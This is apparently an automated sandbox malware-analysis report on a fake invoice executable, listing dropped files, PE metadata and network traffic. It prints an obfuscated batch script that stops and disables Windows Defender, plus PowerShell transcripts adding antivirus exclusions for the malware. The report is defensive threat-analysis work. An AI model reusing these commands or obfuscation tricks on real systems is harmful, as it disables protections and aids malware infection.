                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmcdir3f.qzs.psm1
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvirhnte.pfu.ps1
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxou4y4p.day.psm1
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe
                                                                                                Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):91000
                                                                                                Entropy (8bit):6.241345766746317
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: RFQ - REF 208056-pdf.exe, Detection: malicious, Browse
                                                                                                • Filename: CN-Invoice-XXXXX9808-19011143287994.exe, Detection: malicious, Browse
                                                                                                • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                • Filename: DHL_document1102202068090891.exe, Detection: malicious, Browse
                                                                                                • Filename: em6eElVbOm.exe, Detection: malicious, Browse
                                                                                                • Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse
                                                                                                • Filename: Fireman.exe, Detection: malicious, Browse
                                                                                                • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse
                                                                                                • Filename: payment confirmation 0029175112.exe, Detection: malicious, Browse
                                                                                                • Filename: Vrxs6evJO7.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious, Browse
                                                                                                • Filename: RMe2JcmlSh.exe, Detection: malicious, Browse
                                                                                                • Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious, Browse
                                                                                                • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                • Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse
                                                                                                • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse
                                                                                                • Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse
                                                                                                • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\test.bat
                                                                                                Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):8399
                                                                                                Entropy (8bit):4.665734428420432
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                Malicious:false
                                                                                                Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8
                                                                                                Entropy (8bit):3.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:2fxn:2fx
                                                                                                MD5:3F888302FE47FC6FBC1C7EC48CE40139
                                                                                                SHA1:F94EFF32A22967A52ACC8A6ABF1461A1DAFE3E45
                                                                                                SHA-256:D9274DB2A52E06A8BF93D3C70B67BCD0DB37D6506AB1C1BE7051D25398F2C415
                                                                                                SHA-512:5F3E325A2BA682907579B0A829E8C3030CE162E5C42EAE86CDD31A5535D727323E7CF87C2B1173157BCC7AA3B21A33A63BC5029BEFA47E05A1D0F9A6A175BFC9
                                                                                                Malicious:true
                                                                                                Preview: .~Q....H
                                                                                                C:\Users\user\Documents\20210225\PowerShell_transcript.724536.Z_upAkAn.20210225152748.txt
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):5825
                                                                                                Entropy (8bit):5.42742025599971
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:BZPhLNrqDo1ZrZThLNrqDo1ZzwW4jZ3hLNrqDo1ZfVooqZ9:P
                                                                                                MD5:032A48C89C7252013ED1AE718A2CBD7C
                                                                                                SHA1:19354A860EEA54D1B5B01C2BEF7EA41EF0E7E197
                                                                                                SHA-256:169026FE66F781CCFD5BB000E73F0A5C6F3BA2CC19298F313FAAE418FCE990EE
                                                                                                SHA-512:ED56FF95D1079296EC31C28A0E0EB52E7A7DE48E93B295D5ED54CCF3DF527BAAA252FF5C0D7546A5AE51A66547AE5C0BE49E19CEE86802DFFA16332BA9A86C51
                                                                                                Malicious:false
                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225152801..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724536 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\RiXHGNhjF\svchost.exe -Force..Process ID: 4708..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225152801..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\RiXHGNhjF\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225153424..Username: computer\user..RunAs User: DE
                                                                                                C:\Users\user\Documents\20210225\PowerShell_transcript.724536.nSlXsB3d.20210225152757.txt
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):5885
                                                                                                Entropy (8bit):5.440298132430148
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:BZEhLNMqDo1ZnZXhLNMqDo1Z2rFTjZvhLNMqDo1Z7mDDoZH:o
                                                                                                MD5:2D3E163419BC5658C28F57945C36C8F9
                                                                                                SHA1:D077FDC53CCDF1A737ECF89803E87E834DB0E58A
                                                                                                SHA-256:81E889AC8273B3D9F2C19AD83B65F55DE768B73A18DF16D0A61B948C16E97B23
                                                                                                SHA-512:42B113F4431D1D9223AA420DA5818D1784410542C228AE9F5E386CF5513728106BBA12A8C055E0B0B6FDDFA76BA01FB4B4B9D5D498749BEE607FE65CD123CDE5
                                                                                                Malicious:false
                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225152824..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724536 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..Process ID: 4924..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225152824..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225153507..Username: DESKTOP

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):4.221155622319102
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File size:341280
                                                                                                MD5:6ecb42a8b14658cd4ee39d5e09b103f5
                                                                                                SHA1:f1de55b6def8aadd6cfe7afccb230cf288ad23dd
                                                                                                SHA256:6239f3411c5abb060b14d248c7408eacc2c02c0653ed10ac533177675220aed7
                                                                                                SHA512:e0bb9ecf859eba0b4130a9bed83a3cf7634108200483236eb5557bbf6a3c3a8544a1d6ad670450009f92b514acb3b2622de9aafaa3f4cfcecf5d3eba0630ef6d
                                                                                                SSDEEP:6144:JhoSaX02Mu1UEX/H1UJn4H6LOU/+Pq58s2lP3iFwDt:12Mu1UEX/H1UJn4aKUcq58syP3iF
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0..............6... ...@....@.. ....................................@................................

                                                                                                File Icon

                                                                                                Icon Hash:00828e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x4536fe
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0x85456217 [Wed Nov 7 16:00:23 2040 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Authenticode Signature

                                                                                                Signature Valid:false
                                                                                                Signature Issuer:C=UxZwjnsCduTlfGMiUAfB, S=uePUrebWtdQRxroglXAGlpcP, L=EIbulrAGnqVBenWwyETihJFSgSOwl, T=TiMzWVNdYNohreFEbMcNCIOHJc, E=EbGwkcOCdaBLBPXlVngTzwcuxaZvmTbzlojTSUCZ, OU=ORFoclqdkbwEpFWLMpmpcqPqQpcXqBXinkyLpTavbQ, O=LRupwdYqZreqylSbGWbgOASsnQ, CN=HaqMkgGQmnNHpFsQmzMRDcavkPBzOcvMatDmcLHuDNoiQWMqj
                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                Error Number:-2146762487
                                                                                                Not Before, Not After
                                                                                                • 2/24/2021 5:03:15 PM 2/24/2022 5:03:15 PM
                                                                                                Subject Chain
                                                                                                • C=UxZwjnsCduTlfGMiUAfB, S=uePUrebWtdQRxroglXAGlpcP, L=EIbulrAGnqVBenWwyETihJFSgSOwl, T=TiMzWVNdYNohreFEbMcNCIOHJc, E=EbGwkcOCdaBLBPXlVngTzwcuxaZvmTbzlojTSUCZ, OU=ORFoclqdkbwEpFWLMpmpcqPqQpcXqBXinkyLpTavbQ, O=LRupwdYqZreqylSbGWbgOASsnQ, CN=HaqMkgGQmnNHpFsQmzMRDcavkPBzOcvMatDmcLHuDNoiQWMqj
                                                                                                Version:3
                                                                                                Thumbprint MD5:BC0B1775397EEA2F359228C23A4BC89F
                                                                                                Thumbprint SHA-1:50899EF5014AF31CD54CB9A7C88659A6890B6954
                                                                                                Thumbprint SHA-256:DBA42A2F1138B501C75FF0F56C2426767CE493A6A52084A3E974CE6DAD2256BB
                                                                                                Serial:009ECAA6E28E7615EF5A12D87E327264C0

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x536ac0x4f.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x3e0.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x520000x1520.text
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x560000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000x517040x51800False0.139390816718data4.12984238912IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x540000x3e00x400False0.458984375data3.56184627646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x560000xc0x200False0.041015625data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_VERSION0x540580x388dataEnglishUnited States

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Version Infos

                                                                                                DescriptionData
                                                                                                LegalCopyrightCopyright 2022 GAuhnkDx. All rights reserved.
                                                                                                Assembly Version7.8.5.5
                                                                                                InternalNameVqjVGinN.exe
                                                                                                FileVersion8.7.8.8
                                                                                                CompanyNameRIpLtRvA
                                                                                                LegalTrademarksFwimgQzl
                                                                                                CommentsExLBaikX
                                                                                                ProductNameVqjVGinN
                                                                                                ProductVersion7.8.5.5
                                                                                                FileDescriptionPgJWsfgU
                                                                                                OriginalFilenameVqjVGinN.exe
                                                                                                Translation0x0409 0x0514

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 25, 2021 15:25:53.949407101 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.011135101 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.011269093 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.012653112 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.074294090 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171220064 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171267033 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171278954 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171291113 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171302080 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171318054 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171334028 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171353102 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171370029 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171386003 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.171555996 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.175529957 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.175623894 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.175803900 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.175848961 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.175863028 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.175935984 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.176021099 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.176085949 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.176152945 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.176902056 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.176928043 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.177011013 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.178333998 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.178369045 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.178447008 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.179776907 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.179805040 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.179893017 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.199697018 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.199724913 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.199887037 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.200352907 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.200377941 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.200444937 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.201792002 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.202447891 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.202544928 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.203972101 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.204004049 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.204116106 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.233952045 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.236202002 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.236221075 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.236232042 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.236248970 CET8049754172.67.172.17192.168.2.3
